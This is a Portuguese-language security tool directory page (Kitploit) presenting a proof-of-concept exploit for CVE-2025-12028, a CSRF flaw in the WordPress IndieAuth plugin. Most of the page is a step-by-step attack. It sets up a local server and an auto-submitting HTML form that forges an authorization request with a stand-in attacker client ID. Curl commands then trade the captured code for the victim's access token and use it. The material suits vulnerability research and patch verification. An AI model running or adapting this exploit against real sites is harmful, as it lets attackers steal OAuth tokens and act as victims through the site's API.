Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-12028 — Exploit de prova de conceito para CVE-2025-12028 demonstrando roubo de token OAuth baseado em CSRF no plugin IndieAuth do WordPress, permitindo acesso não autorizado à API com credenciais roubadas. | Kitploit
Ferramentas/GitHubGitHub/jfriedli/cve-2025-12028
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAutenticação
GitHubjfriedli/cve-2025-12028

CVE-2025-12028

Exploit de prova de conceito para CVE-2025-12028 demonstrando roubo de token OAuth baseado em CSRF no plugin IndieAuth do WordPress, permitindo acesso não autorizado à API com credenciais roubadas.

Ver Repositório
1há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

1) Iniciar um servidor HTTP simples para hospedar a página de prova de conceito

root@kitploit:~
mkdir -p /tmp/attacker && cd /tmp/attacker
php -S 127.0.0.1:8000

2) Criar um arquivo /tmp/attacker/poc.html com o seguinte conteúdo

root@kitploit:~
<!doctype html>
<html>
  <body>
    <form id="x" method="post" action="http://localhost/wordpress/wp-login.php?action=indieauth">
      <input name="client_id" value="http://attacker.local/app">
      <input name="redirect_uri" value="http://127.0.0.1:8000/cb">
      <input name="state" value="csrf-12345">
      <input name="response_type" value="code">
      <input name="scope[]" value="create">
      <input name="scope[]" value="update">
      <input name="scope[]" value="delete">
    </form>
    <script>
      document.getElementById('x').submit();
    </script>
  </body>
</html>

3) Acionar o PoC em uma sessão de navegador autenticada

Enquanto estiver autenticado em:

root@kitploit:~
http://localhost/wordpress

Abra:

root@kitploit:~
http://127.0.0.1:8000/poc.html

na mesma sessão do navegador.


4) Observar o redirecionamento de autorização

O navegador irá:

  • Enviar POST para o endpoint IndieAuth com os cookies da vítima
  • Receber um código de autorização
  • Redirecionar para:
root@kitploit:~
http://127.0.0.1:8000/cb?code=...&state=csrf-12345

5) Trocar o código por um token de acesso

root@kitploit:~
curl -sX POST "http://localhost/wordpress/wp-json/indieauth/1.0/token" \
  -d "grant_type=authorization_code" \
  -d "code=PASTE_CODE_FROM_STEP_4" \
  -d "client_id=http://attacker.local/app" \
  -d "redirect_uri=http://127.0.0.1:8000/cb"

6) Observar a resposta do token

A resposta JSON conterá campos como:

  • access_token
  • scope
  • me
  • (possivelmente) refresh_token

Este token pode agora ser usado para agir como a vítima dentro dos escopos concedidos.


7) Verificar o token

root@kitploit:~
TOKEN="PASTE_ACCESS_TOKEN"

curl -s "http://localhost/wordpress/wp-json/indieauth/1.0/token" \
  -H "Authorization: Bearer $TOKEN"
Baixar ferramenta